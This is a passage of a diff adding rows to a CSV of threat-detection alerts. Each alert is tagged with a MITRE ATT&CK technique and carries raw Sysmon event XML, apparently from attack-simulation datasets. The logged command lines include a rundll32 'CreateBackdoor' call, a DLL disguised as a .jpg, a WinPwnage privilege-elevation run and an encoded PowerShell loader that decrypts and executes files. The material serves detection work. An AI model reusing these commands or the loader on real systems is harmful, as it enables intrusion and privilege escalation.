+    <TimeCreated SystemTime=""2020-03-21T05:00:18.014591Z"">
+    </TimeCreated>
+    <EventRecordID>243523</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:17.544</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-001056711E00</Data>
+    <Data Name=""ProcessId"">7380</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1086] PowerShell Process found,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( &quot;C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-14T02:32:51.831307Z"">
+    </TimeCreated>
+    <EventRecordID>17729</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2024"" ThreadID=""2004"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-14 02:32:51.728</Data>
+    <Data Name=""ProcessGuid"">365ABB72-28D3-5CDA-0000-001088C71300</Data>
+    <Data Name=""ProcessId"">3976</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows PowerShell</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\WindowsPowerShell\v1.0\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-26E1-5CDA-0000-002045350100</Data>
+    <Data Name=""LogonId"">0x13545</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-28D3-5CDA-0000-00106DC31300</Data>
+    <Data Name=""ParentProcessId"">3068</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\sysprep\sysprep.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\sysprep\sysprep.exe&quot; </Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1603490297.209324,2020-10-24T01:58:17.209324+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-10-23T21:58:17.176847Z"">
+    </TimeCreated>
+    <EventRecordID>424081</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3208"" ThreadID=""4804"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-10-23 21:58:17.171</Data>
+    <Data Name=""ProcessGuid"">747F3D96-51F9-5F93-0000-001003125E00</Data>
+    <Data Name=""ProcessId"">7552</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-4690-5F93-0000-002019A60800</Data>
+    <Data Name=""LogonId"">0x8a619</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""ParentProcessId"">1216</Data>
+    <Data Name=""ParentImage"">?</Data>
+    <Data Name=""ParentCommandLine"">?</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1603490297.209324,2020-10-24T01:58:17.209324+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-10-23T21:58:17.176847Z"">
+    </TimeCreated>
+    <EventRecordID>424081</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3208"" ThreadID=""4804"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-10-23 21:58:17.171</Data>
+    <Data Name=""ProcessGuid"">747F3D96-51F9-5F93-0000-001003125E00</Data>
+    <Data Name=""ProcessId"">7552</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-4690-5F93-0000-002019A60800</Data>
+    <Data Name=""LogonId"">0x8a619</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""ParentProcessId"">1216</Data>
+    <Data Name=""ParentImage"">?</Data>
+    <Data Name=""ParentCommandLine"">?</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1603490297.209324,2020-10-24T01:58:17.209324+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-10-23T21:58:17.176847Z"">
+    </TimeCreated>
+    <EventRecordID>424081</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3208"" ThreadID=""4804"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-10-23 21:58:17.171</Data>
+    <Data Name=""ProcessGuid"">747F3D96-51F9-5F93-0000-001003125E00</Data>
+    <Data Name=""ProcessId"">7552</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-4690-5F93-0000-002019A60800</Data>
+    <Data Name=""LogonId"">0x8a619</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""ParentProcessId"">1216</Data>
+    <Data Name=""ParentImage"">?</Data>
+    <Data Name=""ParentCommandLine"">?</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920559.894473,2019-05-27T05:29:19.894473+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list vdir /text:userName ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T01:29:19.894473Z"">
+    </TimeCreated>
+    <EventRecordID>5970</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""324"" ThreadID=""2260"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 01:29:19.834</Data>
+    <Data Name=""ProcessGuid"">365ABB72-3D6F-5CEB-0000-0010B2D3FF00</Data>
+    <Data Name=""ProcessId"">3848</Data>
+    <Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
+    <Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Application Server Command Line Admin Tool</Data>
+    <Data Name=""Product"">Internet Information Services</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list vdir /text:userName</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
+    <Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
+    <Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
+    <Data Name=""LogonId"">0x82423</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
+    <Data Name=""ParentProcessId"">2584</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot;  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1053] Scheduled Task - Process,1557621150.227012,2019-05-12T04:32:30.227012+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( &quot;C:\Windows\System32\schtasks.exe&quot; /create /xml c:\users\ieuser\appdata\local\temp\elevator.xml /tn elevator ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-12T00:32:30.211387Z"">
+    </TimeCreated>
+    <EventRecordID>16243</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1996"" ThreadID=""1832"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-12 00:32:30.023</Data>
+    <Data Name=""ProcessGuid"">365ABB72-699E-5CD7-0000-001073582200</Data>
+    <Data Name=""ProcessId"">3876</Data>
+    <Data Name=""Image"">C:\Windows\System32\schtasks.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Manages scheduled tasks</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\schtasks.exe&quot; /create /xml c:\users\ieuser\appdata\local\temp\elevator.xml /tn elevator</Data>
+    <Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-5DEC-5CD7-0000-00204A380100</Data>
+    <Data Name=""LogonId"">0x1384a</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-6998-5CD7-0000-00104E422200</Data>
+    <Data Name=""ParentProcessId"">2740</Data>
+    <Data Name=""ParentImage"">C:\Python27\python.exe</Data>
+    <Data Name=""ParentCommandLine"">python  winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558969958.290374,2019-05-27T19:12:38.290374+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c whoami /groups ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T15:12:38.241298Z"">
+    </TimeCreated>
+    <EventRecordID>6168</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""980"" ThreadID=""2220"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 15:12:38.231</Data>
+    <Data Name=""ProcessGuid"">365ABB72-FE66-5CEB-0000-001058F50B00</Data>
+    <Data Name=""ProcessId"">3256</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd.exe /c whoami /groups </Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-FD85-5CEB-0000-00104C0E0B00</Data>
+    <Data Name=""ParentProcessId"">1944</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\notepad.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\notepad.exe&quot;</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1628379191.072445,2021-08-08T03:33:11.072445+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( &quot;C:\Windows\System32\rundll32.exe&quot; c:\users\public\memViewData.jpg,PluginInit)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-08-07T23:33:08.346260Z"">
+    </TimeCreated>
+    <EventRecordID>556863</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3232"" ThreadID=""4176"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2021-08-07 23:33:08.339</Data>
+    <Data Name=""ProcessGuid"">747F3D96-1834-610F-0000-00105FE5D300</Data>
+    <Data Name=""ProcessId"">6576</Data>
+    <Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
